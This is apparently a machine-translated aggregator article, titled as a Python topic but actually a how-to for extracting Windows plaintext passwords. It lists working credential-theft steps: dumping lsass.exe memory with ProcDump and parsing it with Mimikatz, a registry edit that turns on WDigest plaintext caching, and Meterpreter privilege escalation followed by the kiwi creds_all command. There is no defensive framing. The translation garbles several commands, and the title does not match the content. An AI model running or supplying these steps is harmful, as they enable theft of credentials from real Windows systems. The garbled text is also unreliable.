Shulou(Shulou.com)06/01 Report--

This article mainly introduces python how to directly access the windows plaintext password, has a certain reference value, interested friends can refer to, I hope you can learn a lot after reading this article, the following let Xiaobian take you to understand.

01 、 Procdump+Mimikatz

Use procdump+Mimikatz to get Windows plaintext password by bypassing anti-software.

(1) tool preparation:

ProcDump:

Https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

Mimikatz:

Https://github.com/gentilkiwi/mimikatz/

(2) extract plaintext password from Windows Server 2008 R2

Generate the storage file on the target machine:

Procdump64.exe-accepteula-ma lsass.exe lsass.dmp

Copy the lsass.dmp locally and use the mimikatz one-line command to output the result to text.

Mimikatz.exe "sekurlsa::minidump lsass.dmp"sekurlsa::logonpasswords"exit" > pssword.txt

As shown in the picture: the plaintext password is successfully extracted from memory.

02, Window 2012 R2 grab password

On Windows2012 systems and above, plaintext passwords are prohibited from being saved in the memory cache by default. Attackers can crawl plaintext by modifying the registry, which requires users to log back in before they can crawl successfully.

(1) modify the registry

Reg add HKLM\ SYSTEM\ CurrentControlSet\ Control\ SecurityProviders\ WDigest / v UseLogonCredential / t REG_DWORD / d 1 / f

(2) after logging out of administrator, the user logs in again and grabs the plaintext information successfully.

Mimikatz.exe "privilege::debug"sekurlsa::logonpasswords" > pssword.txt

03, MSF kiwi module

System permissions are required to use the kiwi module, so we need to upgrade the shell in the current MSF to system before using this module.

There are two ways to mention system, one is that the current permissions are administrator users, and the other is to use other means to promote rights to administrator users first. Administrator users can then getsystem directly to system permissions.

Meterpreter > getuidServer username: BYPASS-E97BA3FC\ Administratormeterpreter > getsystem... got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). Meterpreter > getuidServer username: NT AUTHORITY\ SYSTEM

Load the kiwi module:

Load kiwi

List the plaintext passwords in the system:

Creds_all

Thank you for reading this article carefully. I hope the article "python how to directly obtain windows plaintext password" shared by the editor will be helpful to everyone. At the same time, I also hope that you will support and follow the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.